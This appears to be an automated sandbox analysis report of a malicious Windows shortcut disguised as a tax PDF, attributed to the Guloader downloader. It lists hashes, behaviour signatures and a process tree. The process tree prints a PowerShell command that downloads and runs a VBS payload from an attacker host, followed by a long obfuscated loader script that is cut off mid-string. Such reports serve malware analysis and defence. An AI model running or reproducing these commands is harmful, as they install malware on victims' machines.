Analysis

  • max time kernel
    598s
  • max time network
    589s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-03-2023 21:51

General

  • Target

    BrentFisherUSTax.pdf.lnk

  • Size

    2KB

  • MD5

    cfb0a94f960a8e52c4017da1d4d12bff

  • SHA1

    33a3045df1a8306c1e46b0f5b6ad40d4547f6045

  • SHA256

    562ec1673c90fd1932f60b0f4e26e02a059347b88aa2d8fc0bddd058427d6946

  • SHA512

    4f298a350ec57fb26b810d39fbee95f26b769b7fe51c41b00d8fcd7adc661d3af1961d26bbeb2a3522df085254ca5826af1554cbe2ce8ecf3555dab6687d0c99

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks QEMU agent file 2 TTPs 4 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 20 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\BrentFisherUSTax.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" n; Invoke-WebRequest http://0xC2.11808979/zarath/Bydeformerne.vbs -OutFile C:\Windows\Tasks\Tipalose.vbs; C:\Windows\Tasks\Tipalose.vbs; Invoke-WebRequest http://0xC2.11808979/zarath/info.pdf -OutFile C:\Users\Public\details.pdf; C:\Users\Public\details.pdf
      2⤵
      • Blocklisted process makes network request
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3672
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Tipalose.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Delirifacient = """Tit;EcrFantuAddnProcUnstrigiIndoCornSum IndOFricForcIndlLysuTradRaveBarnMaxtSoc0Abi Whi{Whi Rvr Agg Ons SlgpStvaKurrStaaSpamSti(Spe[SweSTratLevrTekiChinHykgCom]Cog<HanSUnktNonaTinmAktgRgesMictSpu)Cor;skr Vur Ort Hol Brn<StaDtariTrivVrkifissToloquarPissBun3Bew1Fif Und=Spe BacNAljeBliwMil-GolOVasbAnojCoueVincmt tund BrebWadyFjrtKnaeLre[Cat]Ram For(Ret<AmpSInstdruaSimmPergketsEfttAth.SalLriseNonnPargBeftpaahEag Mis/Sil Met2Exc)Apo;Una Sla Sta Sto CerFTrioMuorKau(Elm<MarUDisncofnBrauJoutLerrSneiUnstTeliFemoPaauTopsMet=Emn0Mrk;Afs Fin<VinUAthnAlinKlouLattElarAcaiTertOraiCneoRaauTabsSca Nea-ForlHyetCot Dec<PreSUnetbabaObdmNitgbetsBantIll.CloLJobePronSelgFortPhthEur;Fll Cor<OveUPolnBurnStruraatoverKniiSpitNoriIndofeduMilsCar+Lin=Str2con)Unp{Spg til Blo Inf Sub But Bla Dup Tip<KomDPeciKomvGobiovesBuroAbsrSalsIdl3Hor1Dem[For<DelUCapnJaynforuBygtfisrBasiIndtSvoiBasoFinuOpfsTav/Cuf2Fac]Kon Dyn=Dmi Sam[ValcIndoAfhnSnuvUnheBarrUnftUng]Ajl:Ing:SubTIonoUnqBDecyAletpyreGen(Vac<LevSDigtapoaDanmNedgBassSpltTra.DavSPapuFilbIndsDiptZacrDyeiBernLregUds(Del<ConUBinnThinsubuBastGolrDisiGlotGraiBasoBeuuDeksBon,Gad afs2Har)Lev,Rea Mim1Exp6Dih)Hrs;Aud til Ade<KonDCroiPutvTiditilsFjeoRebrUtlsDef3Use1Bru[lau<AncURainKvdnDenuScitHumrKneiBrutBeniEneoDumuUbesant/Slu2Dil]Und Dri=ade tri(Eff<SubDKoniSprvForiBrksKlaoRigrZarsFel3Bes1Ern[Des<BerUsnanSernSubuFiltPedrSupiUndtChoiStioSamuBecsRen/Fox2Fyl]Res Enn-RegbStexDouoEmbrVod Bge1Kem2Fan1Mex)Ill;Agg vir Sla Sli God}Mrk has[IndSTrktProrDisicamnXylgPla]Van[IscSUdpyUnhsKlotHateSysmVed.ArcTReceUntxLagtHus.TokESemnSiecAdvoPigdRepiLamnHecgMem]Dyd:Kro:NonAnedSferCSanIIncIStv.EgeGTrteBrotComSStitSusrSagiGennGumgAir(Dri<RouDFraiGenvMoniFrisPreoUsarMarsReb3Res1Tot)lap;Let}Arr<MigCFraoHjemWelpDuguNonlOvesTriiespoRutnDis0Rad=SavOMedcFracVrklOpluSaldGraeJolnRaatinc0Res Nit'Pre2BruAant0Pro0Sko0AfkARev0HaaDEco1ArbCIld1Loc4uns5Arv7Org1LyzDRab1unc5Cre1Non5Gam'sai;tab<DraCColoErhmCoapdevuPrelHvasStuiFraoBufnBen1Dip=HovOLimcRllcOddlhyruTardLyeeMimnOvetSpo0For Tuf'vra3Opv4Sup1Men0Sol1uddAFus0ProBGeo1Bar6Tur0bogASem1Blo6Tol1AfgFUnl0SamDjak5Sta7Syl2perEExt1Pro0Hov1Byd7Fol4UmtAGob4OnoBSpr5For7Ant2indCRek1res7Hyp0GolAGem1Rit8Col1DemFUnc1KonCant3Agl7Unf1Vrn8spo0BryDSal1bis0Man0aloFNon1DieCHyd3Lep4Mis1borCDeb0DriDBla1Ser1Til1Sri6Kec1ProDpro0CalADof'Dra;Ges<NowCAteodotmFripVrduBillForsAariVanoUmyntur2Swa=QuiOcyncSamcGevlDeouCondFruesqunBantCla0car Bge'Pat3KooEspe1UkuCUhe0upgDHyp2Miz9Dec0DenBEpi1Lec6Par1SatANon3Gal8Law1SnuDPsy1SneDUlt0ProBCol1ForCBad0CneAXyl0TriAArr'Uni;Rou<DecCOutoVagmHavpLeauMyclSucsFeeiBruoCoonBio3Una=FoeOAgucEurcWallGowuStrdToxeBagnAbdtNon0Civ Pig'sab2AngAFor0Skr0aff0wasAImp0NonDAlo1SkaCTel1Lan4Tra5Tem7Leo2KofBTub0EnfCVek1Har7Out0BedDvad1Fea0Per1Bor4Tra1TryCUnd5Coe7Byg3Wil0Arn1Esl7Jus0RouDAfd1TviCPer0SknBSko1Pre6Fje0Spl9Sul2AdvASki1PueCNon0DalBMed0MerFMoo1Aut0Seb1CarAHav1IsnCAbd0ImiAKlu5Afl7Sim3sna1sir1Pyn8Ela1Ere7Egr1LeaDFre1int5Lov1SucCWar2PagBUns1UdvCDip1BhaFOve'Kuv;Syg<StaCOilotarmKonpSeluBaslhulsaaniTeroDysnSpi4Uni=HegOEngcDemcEellaftuRegdElieUngnMortFol0Fem Gen'Kni0RudABor0SnaDArr0FunBOpb1Sup0Opt1Asc7Bar1NasESko'For;Und<JorCNeioStumfarpUnfuRumlBedsUntiFatoGranDys5Cre=KlaOMencUrocOlilKnouOvedCofeSemnTyrtFor0Vel Per'Sid3CakEFas1LyrCSpa0VidDCel3Anc4Ham1Tub6Meg1BooDBle0RooCSpi1Kar5The1NigCSam3Ove1Ros1Rig8Muh1Mil7Tri1FllDgru1Cam5Til1TroCArt'Sub;pet<SubCHaloToimOptpLevuTirlOffsDisifleoPolnSna6Ste=AffOBlucChacTowlRicuKeldForeLdinFlatNat0Bra Nep'Vir2StrBDic2StrDDre2curASta0Abb9Som1IsoCHig1NorApre1ant0loy1Hul8Ung1Ove5Rin3ove7Uns1Uhi8Bal1Pla4Ene1SphCbro5For5Unj5Dis9Opt3Inv1Bil1Pra0Rad1ShuDHor1TynCTpp3TetBCal0Pul0Col2MyrALug1Mor0Hoo1MinEGge5Uds5Col5Uni9aan2Skr9cor0LyrCPho1AntBLed1Fre5Saa1Cru0Pru1KanAWis'oms;Fri<snaCImpoSalmSkipBeduGillQuasMiliTaloPernWhi7Pis=RetOForcheacreflAdauNordLeaeAirnBedtGes0Iri Spi'Sta2JehBMom0NedCBas1Sit7Sty0PraDAan1gym0Dem1Par4sca1TabCNat5Ple5Hov5Fro9Win3Exe4ove1Ple8Unc1Red7Koo1Dve8Dag1PreESlv1PieCTek1AnrDSyn'Kup;rin<JasCPseoBilmSqupHypuSmulOrdsBruiCaroSannMes8Gra=supOQuicNajcBedlOptuTildHaneUbcnLantDan0Sne Akt'Soi2FloBPer1HelCSch1PrdFBev1Inw5Waf1VurCMal1eftAAta0afbDSou1UndCRec1DucDRis3relDVer1RepCCyk1Sem5Rmn1YelCFre1EntERed1Hyp8Est0UruDFru1FryCCli'Gui;Sty<DeiCSlaoarbmMinpBauuDialMizsIotisaloBecnFus9Ima=FroOChucCivcConlPauuInddBereFeanLogtPep0Exp Inc'Ele3Aer0Sky1unr7Bop3Fai4Fre1PliCPse1Tas4Cur1Tel6Byn0ExcBAlt0Par0Sec3Cou4Sch1Led6Sys1hydDCir0SolCSki1Sug5Tva1UdeCFre'Ass;tva<SubVLegiEksnBildKirsForkStriTorbTryeWallMeiiSkogInt0app=ChoOpumcTercforlInfuBlvdDeteJennUdltLam0Sky Jas'Chu3Opt4Keg0Bra0Jos3SubDSko1SkaCBvl1Pag5Rej1LitCFor1staEDer1Glu8Kar0SafDTuc1RoyCRep2StrDtol0Ban0Pap0Cli9Beb1LatCLox'Per;Fac<BemVUnsistinGgedRefsDetkKryiFisbAebeperlBegiSkagFor1Non=indOTygcAntcjeflHymuStndStreSernProtInd0Pan Reg'akt3EksADuk1Eos5Mac1Egi8Fel0SupAVid0PinABal5Trs5Ked5iso9Try2Gen9Kat0BarCFjo1MesBPro1Uss5And1Gun0Bil1UmyASte5Oms5App5Svr9Neu2BymAwhe1MicCall1Neb8Tlp1Jar5Gal1NonCOve1TegDDis5bes5Kri5Sam9Kus3Vel8Zac1Ant7Ape0ForASki1Zyg0Hum3SmmASta1Nut5Mut1med8Kog0BisAber0ShiAKos5Bes5Fag5Pri9Coe3Ski8Res0UngCExo0aglDJeo1Apo6Ove3PisABuf1Whi5Gas1His8Ser0MouASte0BrnADro'Wre;Afv<IkrVIldiPrenSimdSersTorkTriiAdebKinepinlDoniDokgCar2sci=BenObjrcUnbcantlSavuVendRetechenDkvtFre0Man vaa'Kon3Rif0Her1Ant7Aut0AntFKat1Koe6Vas1Out2Udv1SlaCOut'Dep;erh<DecVFeriSmenBridImpsKrlkFriiVanbTrieBuslGitiNongSta3Gel=GruOHercPhocSuilNonuSubdArbeFlunDritCal0Bli Soa'Fem2Emp9for0DiaCCal1OohBSla1Ska5Out1Non0ech1SpkANon5Sun5Hal5Ove9Cel3Lil1Sil1Wor0Sty1MisDStj1AphCTid3aarBMoc0hag0Cho2BloALib1Ver0Cen1SolESla5Kor5Mot5Bag9Gen3Sco7Ung1PerCSwi0SciEaut2TieAMar1Bed5Pap1Lim6Dys0ThyDNup5Omd5Unh5Mad9Tep2BygFsub1Par0Pri0PonBPol0TomDTil0CosCKer1Unv8Tid1Mel5Hov'Dok;Uni<BegVlupiSlanAftdShrsPoskBelikonbGuyeSeilMisihjmgSkr4Ste=FreOWorcWatcSkolOnsuMajdEnfeModnIndtFor0Obe Une'Bar2MadFVet1Ban0Bri0MedBchu0MopDAdn0cynCVia1Frs8esc1Rec5Dig3Uds8lop1Sms5Ric1Sto5Mul1Ste6Sky1BloAPro'Ele;Thr<NigVHeriSplnPapdconsDisksphiRivbTraeElvlHaliDrogMed5Int=LacOspicNoncCanlOveuDiadFageKannfadtArb0Ant Ama'hai1div7St 0NatDEve1HylDRed1Sla5Dse1Und5Neb'Tar;Spe<embVTyviSilnstvdOmesSmukPleiDelbJuleRowlAduiThagTem6omp=PorOSavcLuscBiglTenuKnadSikeTranHumtNek0For Buk'ska3Foo7Pet0EneDpos2Uro9Prs0KalBSec1Kvi6Cla0SojDFro1LrkCNeg1StaABre0LisDSli2bouFalk1Puc0Sat0HolBRes0SymDslu0aguCSch1Sab8Dis1Run5Ber3Sta4Pio1SlaCHel1Sid4woo1Els6Int0OrdBSub0Nuc0pre'Sir;Blu<NonVHeniGudnSasdEvisPigkAkkiUdkbEkseDiklOrdiHongCar7Ban=HanODencForcAnblHjluBlodRotekonnOvetUna0Mav Opk'Gai3Gim0Mis3resCVir2Pom1Fra'Und;Gea<RumVPoiiSlinTardSnasPerkPreiBrubUndeBunlHeniPregCau8Her=StoOSyncafvcmatlChouDdbdLisePadnToltsni0Dia Und'Sha2euk5Eks'Alv;Sch<ForPPrioHovrKortzeurhal=EnlOLancGencFeulCaluSkndGeleMednPlutJag0Bis Epi'Rib2barCMau2chiAJor3ResCPro2TroBAfr4FylAEct4ImpBSup'tof;kit<BeduBydnNriiBlopImpeCrolTritFouaUrbtBaneInt=kodOUndcSkocDealBeruCaldMageJunnSemtOpl0Fej Moe'Ske3CerARet1ech8For1Bro5Arb1Ski5Inf2TraEinf1Acr0Sta1Hje7Som1KreDCiv1Fal6Gal0DenENan2Nap9Mat0UkeBVer1Ben6Exp1MacAPje3Pre8Ops'Ant;RivfTrkuElvnMoocSkntBruiunaoOvenCon MokODiscVarcVrnlMatuGafdBaueWhinhaatEry2Lre2Afl Nik{MucPTagaOpbrProaAbrmAvo Aph(Lup<ReaCLedhNeneSpocForkUnerPhaoLselsvilSta,Tru Pro<ForSUdecEneaRespUdshForoCapiFerdKna)Hou Lyd che Swi Ari Mel;Tyr<SyrRSpreRafgHobeStblImpfFreakirsSactBrasYoutPintVoleBlolGuisBrdealdnGrisGar0Con Gla=AtoOKoscReocIsalThauCindAeneMednrejtRes0Rom Han'Tre5DirDNat2Ecl9Fir1InnCAdv0RagBVre0SstDNet1Son8Rep1Ber0Box1Woo7Skr1FreCDis1DioDSpn5Val9Sti4Ass4Bru5Cay9reg5Lut1Bar2Ero2Lap3Nel8Sou0bel9Mel0Vgg9Kya3BruDBet1grn6Aru1Gem4bac1Mas8Tid1Ndr0Vel1Udh7Deg2Sat4Acr4Lan3Loo4Ord3Fis3CutAtok0AfbCZoo0TunBPec0GenBIxo1intCkat1Ind7Inh0NedDUta3AllDUdv1Ang6Inv1Red4Ind1Sen8Die1Hom0Oml1ple7Sed5Sou7Cou3SelEVid1AcqCInd0BudDCir3Isa8Jub0WhiASkv0UnsAPun1TraCMad1Und4Fal1TanBDal1gru5Sto1Scr0Cal1BunCPen0DubAFor5mas1Kb 5Ind0Van5Und9Non0Ari5Per5sku9Svk2EftEPre1Dyr1Pin1KosCUnr0KerBFan1ConCSyd5Ind4San3Sci6Pup1LgeBUnt1Coe3Bre1ColCAsp1ManANon0BidDkar5sup9Svi0For2Avl5Mis9Ind5SveDOve2Lis6Res5Una7Avi3BatENem1Prr5Lim1Snd6Hov1BldBFal1Hav8rav1Sid5Inv3See8ant0UdtAKej0mooANic1LusCUdl1Str4Afm1BioBOff1Kna5Bru0Omb0Fro3pasACha1Lot8Rut1ArsAKin1Deb1Mns1ChiCtri5Kru9Def5Kim4Eks3Pos8fea1Gem7Tac1EjeDdem5Ens9Eva5CorDCan2Fad6Dig5Cog7Hov3Tra5Tv 1Taw6Spr1RouAHjr1Ele8Kar0ArcDRep1tam0Con1Byg6Chu1Gra7Gal5Rea7Ine2OviABio0Pap9Rep1Tar5Dat1Ant0Dis0MetDDad5Vin1Ulv5MeaDBen2BedFPet1Non0Mor1Ber7Tau1epiDJoy0CabABou1bow2Jer1Gro0Cer1BagBPac1TraCSkr1art5vej1jag0sub1SylEBog4Sph1Und5Bes0Emd2Non2Non5Lon4Tim4pse8non2Per4Bru5Bsn7Pun3JitCDev0Sum8Cem0LoxCHyd1Row8Gro1Con5Sup0UniAPre5Rds1kon5PaaDsko3TorASei1Dip6Hal1Svo4Tar0Gre9Caf0MasCSto1thu5Pla0VinABlo1Mef0Lyn1Fre6Ant1Isc7Pla4Dic9Gul5Tas0Bug5Tid9Daz0Arm4Fja5Tra0Des5Ned7Blo3OveEKor1RinCPar0PerDpan2RseDWha0Mes0Unf0Pin9Cit1ForCTeg5Tre1Sar5aftDing3MesARit1Unw6Rea1Tea4Sen0Bot9Sea0DirCTed1Aug5Diz0NonAImm1sen0Whe1Fjo6Pen1Udb7Udt4Uly8Sam5Irr0Gen'Lac;Uns.Udt<NonVMediSernTavdDissDerkBeviSkobGeneMillStaiPlegSte7Ele Lag<OpsRSpaeForgSvmeHumlEksfdiaaOvesGudtPhysSantnaztRibegrilhypsGdneKapnKonsAmm0Una;Kno<ComRAmbeRusgFaueAlllMaifFilaUnisAuktObsstiltHemtNudeAarlUnesIsieMelnVirsHum5Mer Pro=Elf NedOViochotcSkilInkuSowdBeneEdinSkatMin0All Vir'Lyd5retDImm2WasANon0Fyr0Bal0Qua9baa1Stt1Brn1HolCKlk0OveBRil1ManCKag1CauDEks5Sha9Fje4Mis4For5Bnn9Und5ligDWhi2ops9Kul1TroCHon0OnoBLes0AadDPsy1Brk8Mis1Kli0Car1Dra7Unp1DraCHjs1ForDOpf5Drm7Sti3SpiETen1TykCMoy0SubDuna3Sup4lec1UnsCRot0AthDPra1Bry1Sam1Fod6Baa1HexDHer5col1Coa5UnfDPan3AleATac1Tyk6Bro1Gla4fim0Sal9Enn0CarCCop1cha5unb0PasACha1Leu0Hes1Iso6Fla1Bag7Spi4EpiBBur5Smr5Reu5Bra9Trs2Lig2Sym2FriDRea0For0Maj0Ant9Non1DatCKab2vik2Bad2Ngl4Kav2For4Kon5Gam9Und3Fri9bum5Sta1Rin5tusDUmu3TriAAno1Sou6Bef1Sky4Col0Tal9Chi0AntCMet1Inf5Pru0AlfAKre1Tap0Coc1Bed6Que1Car7Rew4NonASkj5Ste5Pri5Tan9Str5ArcDBec3KanAsta1clu6Day1Non4Bri0led9Bal0pecCTil1Sig5ant0DanAFor1dis0Col1Cha6Oce1Fdr7ben4AmtDHjl5Arm0Unt5Slg0Non'Lou;Rou.Sky<BagVPleiConnChadTilsPnekForiTabbAkkeIpolAeriAfkgRet7fly Cro<HvnRMareHoogLedeAarlsurfMuraModsHerttopsSectrebtBuneKullTolsBudegesnAntsLet5Vur;Kon<IndRUnpeBengGaleUpslInsfSkraAgnsPritSalsHantMahtProeBoalSupsTokeSavnSojssys1Int Jet=Pen graOAntcVancJunlGenusvidmedeFlynUnptaco0ing Byb'Ubi0NonBRip1DekCOve0RifDSup0TerCUnr0ForBcum1Dum7Cat5Par9Int5AutDDet2FleASla0Ste0Sor0Str9Out1Trs1Fol1BurCMet0DinBKbs1MikCdis1ShiDUnd5Esc7Com3Tro0Add1Tor7Dir0DrgFHoc1Pho6tro1Ins2Omd1BajClye5Tri1Lop5RemDUni1Reh7Cav0SnuCCar1Hje5Abe1Sta5Lug5Bar5Suz5Pre9red3Fyr9aut5Pre1Dds2Skr2aff2BilABag0Atm0Sau0VedAAnt0PyrDBon1EroCFor1Fla4Pre5Sve7Und2SpeBBas0UnfCDec1For7nya0FlaDHav1eol0Res1Kal4Ufo1ForCmas5Des7tip3Imp0Aff1Job7Mus0EurDMil1CofCMas0AnlBSku1Tar6Mam0Uds9Met2andAEth1SelCNyh0KamBUnw0betFFyr1Ala0Blg1ConAUbe1komClrr0ForAVis5For7Tre3Una1Erg1Fla8sin1For7Sal1KigDBes1Man5Bra1slgCPha2KnaBPre1SorCCri1JorFSol2Svo4Pil5Ali1Wav3Non7Tyv1KkkCSem0KolENat5inn4cou3Bud6Una1CadBSyn1Alb3Sch1skaCHau1TarAHaa0AkeDGom5Gev9Kan2JokAEns0Myn0Fri0DobATag0SpeDSap1phaCUnf1Afk4Boo5Jam7Cho2EmaBCow0forCGyn1Ass7Gru0DatDBir1wor0Bru1Mas4Tea1RepCCyp5Ant7Wei3Ool0dyb1Sim7Con0BibDBar1UncCSpo0CriBPet1tor6For0Sam9Cse2AnnAGis1NeoCdis0AlfBSaf0SquFPro1Sti0Gir1PneAPri1ThaCUkn0OpeAFac5Way7Him3Dev1Ins1Rag8sul1Bje7Tre1ForDAfi1Cyd5Mas1FisCSta2EoiBNon1AndCPri1SpoFKlo5Udv1Val5Odd1Asf3azo7Sku1uneCCop0PreEFor5Dre4Dev3Fre6Bad1uliBAnt1Tub3Bla1KvaCHul1UnsAFri0befDNon5bru9Pre3For0kav1Mod7Rus0LysDRei2Eur9Out0DiuDGen0OutBVin5Ska0Ing5Non5bis5cro9Gru5Int1Tyf5ParDPlo2Arm9Cal1IndCAna0PreBBob0SnuDUnr1Afh8Fie1Com0Car1Fol7Slr1FolCdes1SynDPos5Dig7pro3ShoEBom1IapCMas0PanDKon3ita4Neu1LejCBil0DdbDRad1Pre1Non1Pyr6Ela1AstDLuc5Vak1bnd5ChoDKer3SupAHid1Any6Deb1Spe4Sip0Cha9Rot0FolCRou1Fru5Pel0LicAReb1Bil0Dia1Trf6osm1Con7Whe4SchCPrc5Ath0Exc5Emu0Ocy5Hke7Mec3gyr0Omb1Hel7avi0MicFUfu1Tri6Unp1Dis2Ter1SnaCAbw5spr1Ant5UddDOve1Baa7Maa0OveCPre1Kil5Nid1Vur5Gen5Dyk5Lac5Fem9raa3Pro9Tub5Pro1ste5KalDBug3MelAstr1Afb1Con1OveCmll1agoADyd1Lam2Gal0GleBsub1Yok6Ind1Imp5Het1Udk5Str5Gam0Gla5Adj0Sko5frs0Lan5And0Gle5Ind5Vol5Pyr9Fys5JubDRev2DdsASpa1MysANic1Amp8for0Num9Tam1Flo1Gra1Cer6Aft1Sub0Gra1CarDUdm5bad0Fru5Pac0Gal'ove;Por.Var<besVTraiSurnBrudHulsDobkStriVagbLeoeMaylOppiPregFik7Lan Kau<quiRDiseVicgTreeBanltrifShraTonsDistBlisEmbtMuntTopeTralCotsDodelignGrasDem1Cru;Tos}AvofSkruNonnSagcBietRhiiGanoAppnThe DveOSchcInfcBaclAgluPredMocepinnTmmtser2man3Cac Cat{OctPWobaKnarcaraBesmveg Pol(Smi[TraPSmoaVaerNovafromDekeAcotGhoeEpirUud(ConPOrdoDiosAfiinontChaiRudoIncnAar Cou=Aku Non0Tri)Sko]Pla Fol[SteTEndyInspgraeSol[Var]ord]Rea Kin<PteoDenpUdtkFrsbMoneeinnSoudEleeGolsCra,Met[anmPPryaFlurPujaIslmTreeWustRopeSterPro(DiaPSomoAtmsScriApitHaliStroBrunDed Rat=Han Fri1Tan)Maa]Res Eta[baiTNeuyOarpKlaeMog]Ade Cor<MisDAlemSkupGhenInviundnYahgSawsStafSheaDetkStotWoloSkorVen Pht=Tre Imp[IneVBaaoGeniEksdnon]Res)Sco;Kob<HusRDateNatgMoneQuilGemfAmeaVirsXystIcisMektProtPeceHanlGylsPlaePulnUnssUnd2Bev geo=Ste JolOOptcPnecWillCeluUmidUroeKosnayltFum0Com Bla'Udr5WouDPro2ForDSer1Kon0Ove1LysDpri0ChaAChe0JenAKin1Con2Une0KunBBet1Ren0Udv1kunFAbe0MetDTal0fotASwi1Hyp8Skl1Gra4pok1Dek5Fre1Geo0Red1Uns7Sol1RegEKon1HaaCTes0CarBHon0IndAdel5Mil9Ger4Blo4Fim5Alb9Imm2Sup2Kla3Uhj8Che0Brn9Lin0Uno9Fin3PhaDOrd1Sci6Car1Pan4sem1Lic8Hel1Dem0Cli1Met7Pic2Sac4Tri4Dat3Ove4Pro3Hyo3phiAThe0StaCAto0MelBSta0sikBSpa1gruCLys1Pal7Tom0SpoDSha3CoeDDer1Ath6oph1Rot4Dyb1dep8Afk1Etm0Che1Ove7Far5Kla7Soc3SrvDDef1RveCUdv1RepFQua1Uds0Reg1Ocy7Jes1OveCSkr3NeuDPla0Jen0Oes1Con7pol1Kit8Vid1Lit4Ten1Aec0Ned1ComAKor3Dat8Chr0AmaASer0TerAPol1PerCDri1Ari4Tra1TllBmes1Asu5bal0Kic0Owl5hal1Bur5Yor1Tid3int7Scy1PosCtre0CocEPhi5Any4Str3Afs6Afv1GanBSal1Str3Opl1VrkCPre1DomAIsc0RefDapp5Eks9Sup2touATan0Feu0Sto0GafAAfh0skeDNon1BorCTro1Ste4Jer5Obs7Epi2RedBDis1VulCDie1hooFAnk1Dec5Und1XanCSta1ConALyc0KroDEri1Stu0Goa1Spr6bir1Pol7Ano5Mae7afe3Brn8Ala0MimAmat0aprAAnt1FrsCExc1Ung4Rou1EpiBpol1Cha5Hag0Hyd0Qiq3Ing7Pri1Scr8Tri1Byr4For1StaCPap5Unb1Sax5kalDMay3ZomACae1Len6Fin1spo4Kad0Cas9Ida0SasCSuc1sin5Non0FriASkr1Tra0Amt1iso6Exc1Met7rev4Cos1Act5Fis0spk5Tyk0Nuc5Unv5Glo5Und9Bri2Har2Bur2UdkATil0Fra0Gla0SupAMtn0FilDTer1RaaCBer1Alm4Sma5Caf7Die2KniBDai1pyrCExo1JgeFStr1Mes5Sti1DagCCom1FodAKlu0SamDCar1Hov0Wor1Hal6Amb1qui7Lnn5Mor7Ret3ColCAco1Esk4Ful1Rag0Mis0CowDPro5ali7Met3Phy8Asp0AutAhob0YilALin1FelCUdb1For4Hal1TreBOve1Smi5Bli0Imp0Bch3synBhal0PodCUro1Elb0Obb1Coe5Kri1FliDMed1TykCSto0BebBPer3Spk8Unl1TreAVar1ExaAKoo1PopCfel0PapAOmb0UnrAKra2Dan4For4Une3Del4Skl3Bro2MejBBen0TruChia1Due7Pos5Gun0Cry5sur7Opb3CriDGir1ColCBar1SprFBeh1Bak0ben1Non7Dip1murCOri3VirDBre0Bra0Ax 1Mes7Met1Rep8Drs1Las4Mis1tur0Her1FroAOve3Und4Myr1Gem6Pin1RobDpan0CyaCAtt1See5Til1SpnCBoo5Rok1Dem5SpiDSku3SpaAmaj1Lag6Und1Sup4bom0Ska9Flo0UdvCSko1Pou5Spe0RecAChe1Fje0Tro1Rea6bra1Roc7Til4Fdn0Opm5Fau5Var5Ddg9Lse5FleDSmi1PseFUdb1Sem8Uor1Udv5Jom0VidAArb1DolCklu5Sme0Stu5Dyr7Fal3konDAff1NvnCCon1ColFkrl1Spe0spi1Gra7Mas1KumCOps2IldDAss0ibr0Str0Kal9Rev1ProCRes5Opr1art5MonDUdu2HitFHje1Orn0Van1opt7Afv1BrdDTil0EvaAPir1Und2Gar1Che0Cat1HemBBud1PinCste1Ind5Eks1Skr0Bjl1AttEOpk4Unn9Sik5Soc5Sur5Lan9lyn5SnoDFor2StaFPse1Ang0Cam1siv7Non1CycDBun0SacASec1Cou2bes1Kar0Kul1micBxer1LeaCyou1Lov5Ben1Che0Par1sneEMic4Ens8Caq5Udv5Con5Pei9Eks2For2Bid2comAHes0Pil0Bap0FasASal0PemDSaf1AkkCEng1Hal4Tit5Afs7Mrk3Cha4Bom0KoeCAro1Vse5Jug0IodDove1Ske0Flu1KolAnar1Hec8Blt0HngAUdr0SkoDAle3AntDAff1ComCHan1Gas5Sol1ScrCRev1ProECom1Ove8Iso0TraDpre1NabCLiv2Non4For5Mak0Fri'Arb;Mod.Sva<SelVFesiRisnInpdFicsUnckToliBilbJuneReplKasiOptgMot7Fli Mol<MisRInaeTekgBeseKnolLogfArtaTilsFortDyrsSuntMistMereBrulKrysRateandnnapsOve2Sem;Fun<PlaRForeBrigTopeForlRaefBygaFirsZontAllsDiktSprtTemeGnolbetsWiseKalnTunsMat3Unc Unr=Slu SerOSmecMincBaslHeruPytdFilePernDeetMaj0Pol Non'Sac5NedDLil2PriDSte1Vu 0Ela1FroDRad0desASab0SkyARel1Sig2Inc0LanBbon1Pro0Twe1CheFCou0AssDvrd0GudARip1Tyl8Feu1Bon4Paa1haa5Int1sau0Ryn1Pte7Gea1SikEEks1OveCDia0BenBStu0UriAFor5Ras7for3TokDSki1irrCWro1NyrFJos1Tre0dit1Tid7mes1SubCPoi3idoApen1Rll6Kon1Abs7Upj0SleATrf0DifDFor0KonBpet0AltCTud1TerAVri0IldDGiv1Gas6Ste0SupBSov5Rum1epo5UndDAut3GalAScr1soa6Tit1Ref4Hea0Neu9Per0IntCApe1Unp5Ult0SteAGat1Sti0For1Dis6Sta1Beb7Gen4DelFLed5ido5Kap5Cha9Mal2Ytt2Unk2CinABur0Per0Spr0CoeADia0JagDPer1StoCLiv1Tor4Het5Ban7Fra2RecBSho1WinCsag1effFLib1Imp5Dan1UdsCDek1feiAUnm0RabDGon1Hei0Udn1Tru6Aut1Skr7Syn5Oph7Agg3OppARam1Sku8Spe1Iga5Dro1Vir5Tun1Wie0Can1Eks7Slv1RenESkr3ForARid1Bev6Hje1Mov7Sli0NonFTil1PisCWac1Ste7Pag0DemD